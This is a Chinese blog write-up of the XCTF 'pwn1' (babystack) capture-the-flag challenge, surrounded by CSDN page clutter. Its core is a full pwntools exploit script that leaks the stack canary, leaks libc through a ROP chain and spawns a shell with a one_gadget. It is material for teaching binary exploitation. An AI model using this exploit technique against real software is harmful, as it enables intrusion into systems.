xctf pwn1

最新推荐文章于 2022-03-03 18:47:01 发布
最新推荐文章于 2022-03-03 18:47:01 发布
阅读量945 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90205759
版权

这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了

本机的库是 2.23 所以我也按照 2.23来打了       然后这个题 可以用system  也可以用 one_gadget 用的是 one_gadget

然后说一下这个题

看起来  就是一个简单的 x64的栈溢出 

然后我们看一下保护

这里面  有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我们要绕过的点

然后 其实这个题直接搞就可以了

下面是exp

#coding:utf-8
from pwn import *
#from roputils import *
context.log_level='debug'

#io=remote('111.198.29.45',52324)
io=process('./babystack')
elf=ELF('./babystack')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
main=0x400908
pop_rdi_addr=0x400a93

def edit(a):
	io.sendlineafter('>> ','1')
	io.sendline(a)

def show():
	io.sendlineafter('>> ','2')

edit('a'*0x88)
show()
io.recvuntil('aaaaaa\n')
canary=u64(io.recv()[0:7].rjust(8,'\x00'))
log.success('canary:'+hex(canary))
pay='a'*0x88+p64(canary)+'a'*0x8
pay+=p64(pop_rdi_addr)+p64(elf.got['puts'])+p64(elf.plt['puts'])
pay+=p64(main)
io.sendline('1')
io.sendline(pay)
io.sendlineafter('>> ','3')
puts_addr=u64(io.recv()[:6].ljust(8,'\x00'))
log.success('puts_addr:'+hex(puts_addr))
libc_puts=libc.symbols['puts']
libc_base=puts_addr-libc_puts
one_gadget_addr=libc_base+0xf02a4
log.success('libc_base:'+hex(libc_base))
log.success('one_gadget_addr:'+hex(one_gadget_addr))
pay='a'*0x88+p64(canary)+'a'*0x8+p64(one_gadget_addr)
io.sendline('1')
io.sendline(pay)
io.sendlineafter('>> ','3')


io.interactive()

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
攻防世界XCTF新手区pwn
weixin_45948183的博客
03-24 672
0x00get_shell 第一个比较简单,直接看IDA里面的源码,da进入main函数查看,有system和bin/sh 直接nc连接就可以拿到flag 0x01CGfsb 先看一下保护机制 IDA里面看一下 可以看出当pwnme=8,就可以拿到flag,然后怎么使pwnme=8呢? 可以看出printf哪里存在格式化字符漏洞,由于printf()函数使用不当,造成任意内存读写,通常使用%...
后台登录-访问数据库登录
l_dragon的专栏
02-24 1021
基于Ant Design Pro V5和若依后台实现登录、鉴权、单表数据的增删改查、动态菜单和路由等简易管理后台基本功能(JS版本)
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1843
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
xctf新手区(附详细过程)
qq_39670065的博客
09-15 2427
攻防世界
SpringBoot 2整合SpringSecurity权限管理(二)配置自定义登录成功和失败处理器
The man was lazy and left no message
03-13 884
概述 上一篇文章讲了,登陆完后会给我们返回信息,这没毛病,但是问题来了,他跳转了页面,假设我们不想跳转页面,只想返回固定格式的JSON呢?这就需要我们自定义成功处理器了。失败的情况也雷同。 一、创建登录成功处理器LoginSuccessHandler,并重写onAuthenticationSuccess方法 @Slf4j @Component public class LoginSuccessHa...
[XCTF-pwn] 1-Mary_Morton
weixin_52640415的博客
03-03 149
太简的没意思,可以怕忘了到哪了,索性把exp按顺序存上。 这个题是个格式化字符串的题,没开pie,程序里有system。 直接把printf改为system就行了 from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 49641) elf = ELF('./pwn') context(arch='amd64', log_level='d
pwn1(xctf)
weixin_43868725的博客
08-08 480
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
pwn学习-中级ROP-1
WocW的博客
03-03 924
CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...
Pwn菜鸡刷题记录 从入门到入土(持续更新ing)
麦芽雪冷萃
10-15 1216
GitHub抢先更新:GitHub - Don2025/CTFwriteUp: The growth record of CTF rookie.The growth record of CTF rookie. Contribute to Don2025/CTFwriteUp development by creating an account on GitHub.https://github.com/Don2025/CTFwriteUp CTFHub ret2text 先file ./ret2text
前端工具包之log美化
weixin_43416898的博客
12-17 876
前言 我们在开发过程中,总会封装一些公共函数来作为我们的工具来简化代码或者复用代码,为此,我打算整理一下我日常工作中常用的一些封装的工具函数,本篇文章主要想实现下面的控制台输出效果,接下来就来看看吧。 系列文章 1.前端工具包之深浅拷贝 2.前端工具包之日期格式化 3.前端工具包之防抖函数 4.前端工具包之小工具 5.前端工具包之log美化 背景 作为一个前端开发者,肯定避免不了F12的控制台调...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
web 2.11 upload1.md
12-16
xctf
writeup:xctf撰写
03-28
写上去xctf撰写
xctf-pwn-“stack2 & pwn1 & welpwn”
njh18790816639的博客
07-30 178
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
【shell】脚本中显示成功、错误、警告函数
michaelwoshi的博客
10-01 1444
# cat echo.sh ############################################ #!/bin/bash function log_failure_msg() { echo "$@" "[ FAILED ]" } function log_success_msg() { echo "$@" "[ OK ]" } function log_warnning_msg() { echo "$@" "[ Warn ]" } log_s...
高德地图加载成功之后回调,增加高德UI组件库,实现拖拽
牟云飞的博客
02-16 3785
高德地图可以在地图加载完成后执行自定义的回调,一种方式是:  map.on("complete", function(){        log.success("地图加载完成!");       }); 链接:https://lbs.amap.com/api/javascript-api/example/map-lifecycle/map-complete 另一种方式是在url上增加ca...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值